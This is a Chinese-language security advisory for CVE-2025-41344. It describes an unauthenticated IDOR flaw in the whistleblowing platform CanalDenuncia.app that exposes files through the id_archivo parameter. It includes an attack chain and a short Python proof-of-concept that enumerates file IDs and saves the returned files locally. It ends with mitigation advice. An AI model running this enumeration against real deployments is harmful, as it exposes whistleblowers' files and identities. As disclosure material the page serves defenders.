CVE-2025-41344 CanalDenuncia.app 授权缺失导致敏感信息泄露

漏洞信息

漏洞编号

CVE-2025-41344

漏洞类型

授权缺失/越权访问

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

CanalDenuncia.app

漏洞概述

CVE-2025-41344是发生在CanalDenuncia.app应用程序中的一个高危授权缺失漏洞。该漏洞存在于后端API接口'/backend/api/verArchivo.php'中，由于该接口对用户请求的授权验证不足，攻击者可以在无需任何认证的情况下，通过构造恶意的POST请求并指定任意的'id_archivo'参数值来访问系统中其他用户的敏感文件信息。CanalDenuncia.app是一个用于接收和处理举报信息的平台，通常包含举报人提交的各类敏感文档和证据材料。攻击者利用此漏洞可以非法获取大量用户的隐私数据，包括举报内容、附件文件、用户身份信息等。该漏洞的CVSS评分达到7.5分，属于高危级别，主要威胁到系统的机密性。鉴于该应用处理的是敏感举报信息，漏洞的潜在危害更为严重，可能导致举报人身份暴露，对举报人的人身安全构成威胁。

技术细节

该漏洞属于典型的IDOR（Insecure Direct Object Reference，不安全的直接对象引用）漏洞。在CanalDenuncia.app的后端代码中，'/backend/api/verArchivo.php'接口直接使用客户端提交的'id_archivo'参数来查询和返回文件内容，而没有验证当前请求的用户是否有权限访问该文件。攻击者只需构造一个带有目标文件ID的POST请求即可绕过授权检查。漏洞接口路径为'/backend/api/verArchivo.php'，攻击者需要向该接口发送POST请求，并在请求体中包含参数'id_archivo'，其值为目标文件的唯一标识符。由于该接口缺少会话验证和权限检查，任何未经认证的用户都可以直接访问任意文件内容。攻击者可以通过枚举'id_archivo'的值来批量获取系统中的敏感文件信息。漏洞的利用不需要任何特殊的工具或技术，普通的HTTP请求工具如curl即可完成攻击。

攻击链分析

STEP 1

步骤1

攻击者发现CanalDenuncia.app存在未授权访问漏洞，访问后端API路径'/backend/api/verArchivo.php'

STEP 2

步骤2

攻击者构造恶意的POST请求，在请求体中包含'id_archivo'参数，值为目标文件的唯一标识符

STEP 3

步骤3

由于接口缺少授权验证，服务器直接根据'id_archivo'参数返回对应的文件内容

STEP 4

步骤4

攻击者通过枚举或猜测不同的'id_archivo'值，批量获取系统中其他用户的敏感文件信息

STEP 5

步骤5

攻击者收集并分析获取的敏感数据，可能用于进一步攻击或出售给第三方

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-41344 PoC - CanalDenuncia.app Authorization Bypass
# Target: CanalDenuncia.app
# Endpoint: /backend/api/verArchivo.php
# Parameter: id_archivo
# Impact: Unauthorized access to other users' sensitive file information

target_url = "http://target-website.com/backend/api/verArchivo.php"

# Try to access files with different IDs
for file_id in range(1, 100):
    payload = {
        'id_archivo': str(file_id)
    }
    
    try:
        response = requests.post(target_url, data=payload, timeout=10)
        
        if response.status_code == 200 and len(response.content) > 0:
            print(f"[!] File ID {file_id} accessible - Size: {len(response.content)} bytes")
            # Save accessible file
            with open(f"exfiltrated_file_{file_id}.bin", "wb") as f:
                f.write(response.content)
        else:
            print(f"[-] File ID {file_id} - No access or empty response")
            
    except requests.exceptions.RequestException as e:
        print(f"[ERROR] Request failed: {e}")

print("[*] PoC execution completed")

影响范围

CanalDenuncia.app 所有版本

防御指南

临时缓解措施

在官方修复方案发布之前，建议临时关闭'/backend/api/verArchivo.php'接口或限制其访问，对该接口实施IP白名单访问控制，同时加强前端页面的访问日志监控，及时发现异常访问行为。